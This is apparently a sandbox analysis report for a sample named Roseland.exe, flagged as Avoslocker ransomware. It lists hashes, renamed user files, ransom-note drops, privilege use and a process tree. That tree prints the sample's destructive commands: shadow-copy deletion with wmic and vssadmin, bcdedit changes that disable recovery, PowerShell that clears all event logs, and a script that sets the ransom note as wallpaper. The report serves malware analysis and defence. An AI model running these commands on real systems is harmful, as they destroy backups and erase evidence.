Resubmissions
submitted | task ID | score
16-03-2023 09:24 | 230316-ldhxdaab62 | 10
16-03-2023 09:12 | 230316-k56l3sab26 | 10
30-01-2023 14:58 | 230130-sb9ewaag73 | 9
30-01-2023 14:44 | 230130-r4m7nscd8s | 9
13-01-2023 09:23 | 230113-lcgmxsfh22 | 9
Analysis
max time kernel: 60s
max time network: 36s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
submitted: 16-03-2023 09:12
Static task: static1
Behavioral task: behavioral1 (Sample: Roseland.exe; Resource: win7-20230220-en)
Behavioral task: behavioral2 (Sample: Roseland.exe; Resource: win10v2004-20230220-en)
General
Target: Roseland.exe
Size: 807KB
MD5: 19944159dfa94a1b75effd85e6b906dc
SHA1: 250acf87366f4c0cf91679a0e93dfc79954f0f10
SHA256: bff12a83b1fc2e0ad0000ad9b68abc8eada559bb1094caaf5b9f52887df23705
SHA512: c791840f59c2fc906c197c43e0e1717b9504cf46177a3688ecbd4937cdbf95349d68cc1e63649b85f02df4e6990c4df4756dd8267b062ea5271dd61fc3e508b0
SSDEEP: 12288:0Z4s3rg9u/2/oT+NXtHLlP/O+OeO+OeNhBBhhBBAtHg9rjI+LXJ0ivlzkHBDsYA7:u4s+oT+NXBLi0rjFXvyHBlbnCZa8
Malware Config
Signatures
- Avoslocker Ransomware
  Avoslocker is a relatively new ransomware that was observed in late June and early July 2021.
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  Processes:
  pid | Process
  1740 | bcdedit.exe
  2460 | bcdedit.exe
- Modifies extensions of user files (7 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes:
  description | ioc | Process
  File opened for modification | C:\Users\Admin\Pictures\HideGroup.tiff | Roseland.exe
  File renamed | C:\Users\Admin\Pictures\HideGroup.tiff => C:\Users\Admin\Pictures\HideGroup.tiff.avos2 | Roseland.exe
  File renamed | C:\Users\Admin\Pictures\PublishGrant.tif => C:\Users\Admin\Pictures\PublishGrant.tif.avos2 | Roseland.exe
  File renamed | C:\Users\Admin\Pictures\ResumeUnregister.tif => C:\Users\Admin\Pictures\ResumeUnregister.tif.avos2 | Roseland.exe
  File renamed | C:\Users\Admin\Pictures\SubmitUnpublish.raw => C:\Users\Admin\Pictures\SubmitUnpublish.raw.avos2 | Roseland.exe
  File renamed | C:\Users\Admin\Pictures\UnblockClose.raw => C:\Users\Admin\Pictures\UnblockClose.raw.avos2 | Roseland.exe
  File renamed | C:\Users\Admin\Pictures\UnregisterOpen.raw => C:\Users\Admin\Pictures\UnregisterOpen.raw.avos2 | Roseland.exe
- Drops desktop.ini file(s) (1 IoC)
  Processes:
  description | ioc | Process
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI | Roseland.exe
- Enumerates connected drives (3 TTPs, 1 IoC)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes:
  description | ioc | Process
  File opened (read-only) | \??\Z: | Roseland.exe
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes:
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1209476241.png" | reg.exe
- Drops file in Program Files directory (64 IoCs)
  Processes:
  description | ioc | Process
  File created | C:\Program Files\Microsoft Games\Multiplayer\Spades\de-DE\GET_YOUR_FILES_BACK.txt | Roseland.exe
  File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-core-execution.xml_hidden | Roseland.exe
  File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zaporozhye | Roseland.exe
  File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ipssrb.xml | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-down.png | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0281638.WMF | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATER\WATER.ELM | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18233_.WMF | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office 2.xml | Roseland.exe
  File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonDown_Off.png | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_few-showers.png | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGREPFRM.DPV | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\UTILITY.ACCDA | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\js\settings.js | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\TAB_OFF.GIF | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02398U.BMP | Roseland.exe
  File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\settings.html | Roseland.exe
  File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-ui.xml | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\currency.js | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\MARQUEE.POC | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00910_.WMF | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui | Roseland.exe
  File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\GET_YOUR_FILES_BACK.txt | Roseland.exe
  File created | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\GET_YOUR_FILES_BACK.txt | Roseland.exe
  File created | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\es\GET_YOUR_FILES_BACK.txt | Roseland.exe
  File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Novokuznetsk | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGMARQ.XML | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLOOK_F_COL.HXK | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0297551.WMF | Roseland.exe
  File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CST6CDT | Roseland.exe
  File opened for modification | C:\Program Files\Java\jre7\lib\images\cursors\cursors.properties | Roseland.exe
  File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-util-enumerations.jar | Roseland.exe
  File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder_5.5.0.165303.jar | Roseland.exe
  File opened for modification | C:\Program Files\Microsoft Games\Purble Place\de-DE\PurblePlace.exe.mui | Roseland.exe
  File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_zh_4.4.0.v20140623020002.jar | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_pressed.png | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_pressed.png | Roseland.exe
  File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\2.png | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00194_.WMF | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_few-showers.png | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Thatch.thmx | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00186_.WMF | Roseland.exe
  File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\24.png | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0188513.WMF | Roseland.exe
  File created | C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\GET_YOUR_FILES_BACK.txt | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\QRCode.pmp | Roseland.exe
  File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\logo.png | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_48.png | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.XML | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_HighMask.bmp | Roseland.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\[email protected] | Roseland.exe
  File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\720_480shadow.png | Roseland.exe
  File created | C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\x86\GET_YOUR_FILES_BACK.txt | Roseland.exe
  File opened for modification | C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui | Roseland.exe
  File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml | Roseland.exe
  File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar | Roseland.exe
  File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Denver | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\slideShow.html | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Premium.gif | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImagesMask.bmp | Roseland.exe
  File opened for modification | C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac | Roseland.exe
  File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\.lastModified | Roseland.exe
  File opened for modification | C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui | Roseland.exe
- Interacts with shadow copies (2 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes:
  pid | Process
  2112 | vssadmin.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes:
  pid | Process
  1728 | Roseland.exe
  2716 | powershell.exe
  2900 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes:
  description | pid | Process
  Token: SeTakeOwnershipPrivilege | 1728 | Roseland.exe
  Token: SeIncreaseQuotaPrivilege | 2424 | WMIC.exe
  Token: SeSecurityPrivilege | 2424 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 2424 | WMIC.exe
  Token: SeLoadDriverPrivilege | 2424 | WMIC.exe
  Token: SeSystemProfilePrivilege | 2424 | WMIC.exe
  Token: SeSystemtimePrivilege | 2424 | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 2424 | WMIC.exe
  Token: SeIncBasePriorityPrivilege | 2424 | WMIC.exe
  Token: SeCreatePagefilePrivilege | 2424 | WMIC.exe
  Token: SeBackupPrivilege | 2424 | WMIC.exe
  Token: SeRestorePrivilege | 2424 | WMIC.exe
  Token: SeShutdownPrivilege | 2424 | WMIC.exe
  Token: SeDebugPrivilege | 2424 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 2424 | WMIC.exe
  Token: SeRemoteShutdownPrivilege | 2424 | WMIC.exe
  Token: SeUndockPrivilege | 2424 | WMIC.exe
  Token: SeManageVolumePrivilege | 2424 | WMIC.exe
  Token: 33 | 2424 | WMIC.exe
  Token: 34 | 2424 | WMIC.exe
  Token: 35 | 2424 | WMIC.exe
  Token: SeBackupPrivilege | 2580 | vssvc.exe
  Token: SeRestorePrivilege | 2580 | vssvc.exe
  Token: SeAuditPrivilege | 2580 | vssvc.exe
  Token: SeDebugPrivilege | 2716 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 2424 | WMIC.exe
  Token: SeSecurityPrivilege | 2424 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 2424 | WMIC.exe
  Token: SeLoadDriverPrivilege | 2424 | WMIC.exe
  Token: SeSystemProfilePrivilege | 2424 | WMIC.exe
  Token: SeSystemtimePrivilege | 2424 | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 2424 | WMIC.exe
  Token: SeIncBasePriorityPrivilege | 2424 | WMIC.exe
  Token: SeCreatePagefilePrivilege | 2424 | WMIC.exe
  Token: SeBackupPrivilege | 2424 | WMIC.exe
  Token: SeRestorePrivilege | 2424 | WMIC.exe
  Token: SeShutdownPrivilege | 2424 | WMIC.exe
  Token: SeDebugPrivilege | 2424 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 2424 | WMIC.exe
  Token: SeRemoteShutdownPrivilege | 2424 | WMIC.exe
  Token: SeUndockPrivilege | 2424 | WMIC.exe
  Token: SeManageVolumePrivilege | 2424 | WMIC.exe
  Token: 33 | 2424 | WMIC.exe
  Token: 34 | 2424 | WMIC.exe
  Token: 35 | 2424 | WMIC.exe
  Token: SeBackupPrivilege | 2716 | powershell.exe
  Token: SeSecurityPrivilege | 2716 | powershell.exe
  Token: SeBackupPrivilege | 2716 | powershell.exe
  Token: SeBackupPrivilege | 2716 | powershell.exe
  Token: SeSecurityPrivilege | 2716 | powershell.exe
  Token: SeBackupPrivilege | 2716 | powershell.exe
  Token: SeBackupPrivilege | 2716 | powershell.exe
  Token: SeSecurityPrivilege | 2716 | powershell.exe
  Token: SeBackupPrivilege | 2716 | powershell.exe
  Token: SeBackupPrivilege | 2716 | powershell.exe
  Token: SeSecurityPrivilege | 2716 | powershell.exe
  Token: SeBackupPrivilege | 2716 | powershell.exe
  Token: SeBackupPrivilege | 2716 | powershell.exe
  Token: SeSecurityPrivilege | 2716 | powershell.exe
  Token: SeBackupPrivilege | 2716 | powershell.exe
  Token: SeBackupPrivilege | 2716 | powershell.exe
  Token: SeSecurityPrivilege | 2716 | powershell.exe
  Token: SeBackupPrivilege | 2716 | powershell.exe
  Token: SeSecurityPrivilege | 2716 | powershell.exe
- Suspicious use of WriteProcessMemory (45 IoCs)
  Processes:
  description | pid | Process | procid_target
  PID 1728 wrote to memory of 2044 | 1728 | Roseland.exe | 28
  PID 1728 wrote to memory of 2044 | 1728 | Roseland.exe | 28
  PID 1728 wrote to memory of 2044 | 1728 | Roseland.exe | 28
  PID 1728 wrote to memory of 2044 | 1728 | Roseland.exe | 28
  PID 1728 wrote to memory of 1300 | 1728 | Roseland.exe | 29
  PID 1728 wrote to memory of 1300 | 1728 | Roseland.exe | 29
  PID 1728 wrote to memory of 1300 | 1728 | Roseland.exe | 29
  PID 1728 wrote to memory of 1300 | 1728 | Roseland.exe | 29
  PID 1728 wrote to memory of 1412 | 1728 | Roseland.exe | 30
  PID 1728 wrote to memory of 1412 | 1728 | Roseland.exe | 30
  PID 1728 wrote to memory of 1412 | 1728 | Roseland.exe | 30
  PID 1728 wrote to memory of 1412 | 1728 | Roseland.exe | 30
  PID 1728 wrote to memory of 1684 | 1728 | Roseland.exe | 31
  PID 1728 wrote to memory of 1684 | 1728 | Roseland.exe | 31
  PID 1728 wrote to memory of 1684 | 1728 | Roseland.exe | 31
  PID 1728 wrote to memory of 1684 | 1728 | Roseland.exe | 31
  PID 1728 wrote to memory of 748 | 1728 | Roseland.exe | 32
  PID 1728 wrote to memory of 748 | 1728 | Roseland.exe | 32
  PID 1728 wrote to memory of 748 | 1728 | Roseland.exe | 32
  PID 1728 wrote to memory of 748 | 1728 | Roseland.exe | 32
  PID 1684 wrote to memory of 1740 | 1684 | cmd.exe | 33
  PID 1684 wrote to memory of 1740 | 1684 | cmd.exe | 33
  PID 1684 wrote to memory of 1740 | 1684 | cmd.exe | 33
  PID 1300 wrote to memory of 2112 | 1300 | cmd.exe | 34
  PID 1300 wrote to memory of 2112 | 1300 | cmd.exe | 34
  PID 1300 wrote to memory of 2112 | 1300 | cmd.exe | 34
  PID 748 wrote to memory of 2716 | 748 | cmd.exe | 35
  PID 748 wrote to memory of 2716 | 748 | cmd.exe | 35
  PID 748 wrote to memory of 2716 | 748 | cmd.exe | 35
  PID 2044 wrote to memory of 2424 | 2044 | cmd.exe | 37
  PID 2044 wrote to memory of 2424 | 2044 | cmd.exe | 37
  PID 2044 wrote to memory of 2424 | 2044 | cmd.exe | 37
  PID 1412 wrote to memory of 2460 | 1412 | cmd.exe | 36
  PID 1412 wrote to memory of 2460 | 1412 | cmd.exe | 36
  PID 1412 wrote to memory of 2460 | 1412 | cmd.exe | 36
  PID 1728 wrote to memory of 2900 | 1728 | Roseland.exe | 42
  PID 1728 wrote to memory of 2900 | 1728 | Roseland.exe | 42
  PID 1728 wrote to memory of 2900 | 1728 | Roseland.exe | 42
  PID 1728 wrote to memory of 2900 | 1728 | Roseland.exe | 42
  PID 2900 wrote to memory of 3392 | 2900 | powershell.exe | 43
  PID 2900 wrote to memory of 3392 | 2900 | powershell.exe | 43
  PID 2900 wrote to memory of 3392 | 2900 | powershell.exe | 43
  PID 2900 wrote to memory of 3512 | 2900 | powershell.exe | 44
  PID 2900 wrote to memory of 3512 | 2900 | powershell.exe | 44
  PID 2900 wrote to memory of 3512 | 2900 | powershell.exe | 44
- Uses Volume Shadow Copy service COM API
  The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
- C:\Users\Admin\AppData\Local\Temp\Roseland.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Roseland.exe"
  - Modifies extensions of user files
  - Drops desktop.ini file(s)
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 1728
  - C:\Windows\system32\cmd.exe
    Command line: cmd /c wmic shadowcopy delete /nointeractive
    - Suspicious use of WriteProcessMemory
    PID: 2044
    - C:\Windows\System32\Wbem\WMIC.exe
      Command line: wmic shadowcopy delete /nointeractive
      - Suspicious use of AdjustPrivilegeToken
      PID: 2424
  - C:\Windows\system32\cmd.exe
    Command line: cmd /c vssadmin.exe Delete Shadows /All /Quiet
    - Suspicious use of WriteProcessMemory
    PID: 1300
    - C:\Windows\system32\vssadmin.exe
      Command line: vssadmin.exe Delete Shadows /All /Quiet
      - Interacts with shadow copies
      PID: 2112
  - C:\Windows\system32\cmd.exe
    Command line: cmd /c bcdedit /set {default} recoveryenabled No
    - Suspicious use of WriteProcessMemory
    PID: 1412
    - C:\Windows\system32\bcdedit.exe
      Command line: bcdedit /set {default} recoveryenabled No
      - Modifies boot configuration data using bcdedit
      PID: 2460
  - C:\Windows\system32\cmd.exe
    Command line: cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
    - Suspicious use of WriteProcessMemory
    PID: 1684
    - C:\Windows\system32\bcdedit.exe
      Command line: bcdedit /set {default} bootstatuspolicy ignoreallfailures
      - Modifies boot configuration data using bcdedit
      PID: 1740
  - C:\Windows\system32\cmd.exe
    Command line: cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
    - Suspicious use of WriteProcessMemory
    PID: 748
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2716
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID: 2900
    - C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1209476241.png /f
      - Sets desktop wallpaper using registry
      PID: 3392
    - C:\Windows\system32\rundll32.exe
      Command line: "C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
      PID: 3512
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  PID: 2580
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 1011B
  MD5: 6d81ed40ba0a283e5483bfe6a448e9d7
  SHA1: 0c847a5f9df743b13e1aa11b4c24a4309e9a7119
  SHA256: b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d
  SHA512: 8956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379
- Filesize: 32KB
  MD5: 1524411f3d6138062f1bd5ab5d31338c
  SHA1: 49292962485c61cf2307b139b494da8512a52916
  SHA256: d5e0fa9b4d02e1225dff1af879333969f9245e8a2820a1635130ffccb6b27dd2
  SHA512: ec8346d0c0b5ebcf171eb8aaf02d41ad3785f1a6c39c9e16ec9c84fd857ccd8d59f4ab69df5c1a919eb1248af2929b61cd9ca7292091ffb09352234b6c3c4c55
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: c9734dd629f10b384479160ed4046063
  SHA1: 4d98ef5d3cb709eaa6683d6c09c1c2317362b06b
  SHA256: 76c16a2766e8af4b622e6e5848a261ed37a9ff758c528037f5b15e5eceb60ce1
  SHA512: 144a8f3211ec7ca625e5f958a0caea2e7024f58a85e1cd57d0f32466b104e41cbcd97ce748f3d077bbc54bb9e6826aa788843f53043fe6f4f54057a9d1ed2b17
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FVFLMG0ZOJDG33R86VBG.temp
  Filesize: 7KB
  MD5: c9734dd629f10b384479160ed4046063
  SHA1: 4d98ef5d3cb709eaa6683d6c09c1c2317362b06b
  SHA256: 76c16a2766e8af4b622e6e5848a261ed37a9ff758c528037f5b15e5eceb60ce1
  SHA512: 144a8f3211ec7ca625e5f958a0caea2e7024f58a85e1cd57d0f32466b104e41cbcd97ce748f3d077bbc54bb9e6826aa788843f53043fe6f4f54057a9d1ed2b17
- Filesize: 1011B
  MD5: 6d81ed40ba0a283e5483bfe6a448e9d7
  SHA1: 0c847a5f9df743b13e1aa11b4c24a4309e9a7119
  SHA256: b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d
  SHA512: 8956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379
- MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e